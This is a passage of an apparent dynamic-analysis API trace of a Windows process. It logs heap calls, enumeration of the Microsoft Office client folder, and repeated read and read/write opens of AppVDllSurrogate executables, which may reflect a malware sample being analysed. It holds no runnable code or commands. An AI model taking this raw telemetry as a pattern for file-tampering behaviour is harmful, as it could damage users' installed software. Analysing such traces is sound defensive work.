dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0099.961] AreFileApisANSI () returned 1 [0099.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8cb90, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll") returned 80 [0099.961] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-utility-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b7fe91, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b7fe91, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1ec71c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.961] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b59cda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b59cda, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f1370b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34ad8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVDllSurrogate32.exe", cAlternateFileName="APPVDL~2.EXE")) returned 1 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.962] AreFileApisANSI () returned 1 [0099.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe", lpUsedDefaultChar=0x0) returned 69 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.963] AreFileApisANSI () returned 1 [0099.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0099.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 69 [0099.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.963] GetFileType (hFile=0x368) returned 0x1 [0099.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0099.963] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.963] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.963] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.964] CloseHandle (hObject=0x368) returned 1 [0099.964] AreFileApisANSI () returned 1 [0099.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0099.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 69 [0099.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.964] GetFileType (hFile=0x368) returned 0x1 [0099.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0099.964] CloseHandle (hObject=0x368) returned 1 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.965] AreFileApisANSI () returned 1 [0099.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0099.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe") returned 69 [0099.965] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate32.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate32.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1b59cda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1b59cda, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1f1370b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34ad8)) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e2e85a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e4d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVDllSurrogate64.exe", cAlternateFileName="APPVDL~1.EXE")) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0099.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.966] AreFileApisANSI () returned 1 [0099.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe", lpUsedDefaultChar=0x0) returned 69 [0099.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.967] AreFileApisANSI () returned 1 [0099.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0099.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe") returned 69 [0099.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.967] GetFileType (hFile=0x368) returned 0x1 [0099.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.967] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.967] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.968] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.968] CloseHandle (hObject=0x368) returned 1 [0099.968] AreFileApisANSI () returned 1 [0099.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0099.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe") returned 69 [0099.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.968] GetFileType 